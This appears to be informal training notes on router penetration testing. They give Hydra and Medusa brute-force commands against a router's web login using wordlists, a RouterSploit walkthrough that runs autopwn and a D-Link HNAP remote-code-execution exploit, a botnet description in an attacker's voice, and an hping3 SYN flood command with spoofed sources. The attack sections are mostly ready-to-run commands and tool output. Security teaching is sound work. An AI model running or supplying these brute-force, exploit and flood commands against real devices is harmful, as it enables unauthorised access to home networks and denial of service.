Router Pentesting-----------------VAPT - Vulnerability Accessment And Pen Te

1. Router Pentesting
2. -----------------
3. VAPT - Vulnerability Accessment And Pen Testing
4. We also do the same for the routers and networking smart devices. Routers, switches etc etc.....
5. 1. Should have a strong password minimum of 16 characters
6. 2. Password should be alphanumeric, case sentivie and special characters
7. 3. Password should never be a single word like "LuciferMorningStar", it should always be a phrase like "SplinterItIntoThousandsPiecesAndScatterItIntoTheWind"
8. 4. Never keep the password like "LoveYouBaby", "IHateYou", "Password", "123456789a"
9.  
10. There are many scenarios, which we need to consider while pentesting a router.
11.  
12. 1. Dumbest People ---> Who never change their default username and password, those who never set their router's password.
13. http://routerpasswords.com/
14. http://192-168-1-1ip.mobi/default-router-passwords-list/
15.  
16. 2. Little Smart People --> In this scenario, people change their default password.
17.  
18. 3. More Smart people ---> They change both of the username and password of the router.
19.  
20. ---> Hydra ---> Demo
21. ---> Medusa --> Task for you to do...
22.  
23. When user name is default but the password is changed by user
24. --------------------------------------------------------------
25. hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
26.  
27. hydra --> a brute forcing tool which is used to crack the services ----> ftp, ssh, telnet, http etc etc
28. -s ---> port number
29. 80 ---> HTTP protocol port number
30. -l ---> username
31. admin --> default username
32. -P --> password dictionary
33. /usr/share/wordlists/rockyou.txt ---> dictionary in which my password is stored
34. 192.168.0.1 ---> dafault gateway ---> IP Address of the router
35. http-get ----> Parameter via which communication occurs---> through which my trnamission of credentials happed
36.  
37.  
38.  
39. Where The More Smart People Changed The Username And Password
40. -------------------------------------------------------------
41.  
42. hydra -s 80 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
43.  
44.  
45. To resume hydra session I can type "hydra -R"
46.  
47.  
48. Medusa ---> Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items to some of the key features of this application:
49.  
50. cvs imap nntp postgres rlogin smtp ssh vmauthd wrapper
51. ftp mssql pcanywhere rdp rsh smtp-vrfy svn vnc
52. http mysql pop3 rexec smbnt snmp telnet web-form
53.  
54.  
55. medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
56.  
57. 4. Where people are Smartest, they hide the background information of the router's login page.... You will get a prompt, where it will be written: Username :________
58. Password :________
59.  
60. Routersploit-Framework
61. ----------------------
62. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
63. It consists of various modules that aids penetration testing operations:
64.  
65. exploits - modules that take advantage of identified vulnerabilities
66. creds - modules designed to test credentials against network services
67. scanners - modules that check if a target is vulnerable to any exploit
68.  
69. Download It From
70. https://github.com/reverse-shell/routersploit
71.  
72.  
73. Open the terminal, type
74. # git clone https://github.com/reverse-shell/routersploit.git
75. # cd routersploit
76. # pip install -r requirements.txt
77. # ./rsf.py
78.  
79. ______ _ _____ _ _ _
80. | ___ \ | | / ___| | | (_) |
81. | |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
82. | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
83. | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
84. \_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
85. | |
86. IoT Exploitation Framework |_|
87.  
88. Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
89. Codename : Bad Blood
90. Version : 2.2.1
91.  
92. Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10
93.  
94. rsf >
95. rsf > use scanners/autopwn
96. rsf (AutoPwn) > show options
97. rsf (AutoPwn) > set target 192.168.0.1
98. rsf (AutoPwn) > show options
99.  
100. Target options:
101.  
102. Name Current settings Description
103. ---- ---------------- -----------
104. target 192.168.0.1 Target IP address e.g. 192.168.1.1
105. port 80 Target port
106.  
107.  
108. Module options:
109.  
110. Name Current settings Description
111. ---- ---------------- -----------
112. threads 8 Number of threads
113.  
114. rsf (AutoPwn) > run
115.  
116.  
117. rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
118. rsf (D-Link Multi HNAP RCE) >
119. rsf (D-Link Multi HNAP RCE) > show options
120.  
121. Target options:
122.  
123. Name Current settings Description
124. ---- ---------------- -----------
125. target Target address e.g. http://192.168.1.1
126. port 80 Target Port
127.  
128.  
129. rsf (D-Link Multi HNAP RCE) > set target http://192.168.0.1
130. [+] {'target': 'http://192.168.0.1'}
131. rsf (D-Link Multi HNAP RCE) > show options
132. rsf (D-Link Multi HNAP RCE) > run
133.  
134.  
135.  
136. BOTNETS
137. -------
138. roBOT + NETwork = BOTNET
139. I will spread my trojan and the malicious malware, so that I can control the infected peron via my laptop.
140.  
141. DoS --> Denial Of Services
142. When a user is sending huge amount of data packets to the target and slows down the system.
143.  
144. hping3
145. ------
146. hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies.
147. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported
148. protocols. Using hping3 you are able to perform at least the following stuff:
149.  
150. - Test firewall rules
151. - Advanced port scanning
152. - Test net performance using different protocols,
153. packet size, TOS (type of service) and fragmentation.
154. - Path MTU discovery
155. - Transferring files between even really fascist firewall
156. rules.
157. - Traceroute-like under different protocols.
158. - Firewalk-like usage.
159. - Remote OS fingerprinting.
160. - TCP/IP stack auditing.
161. - A lot of others.
162.  
163. hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.16.79.141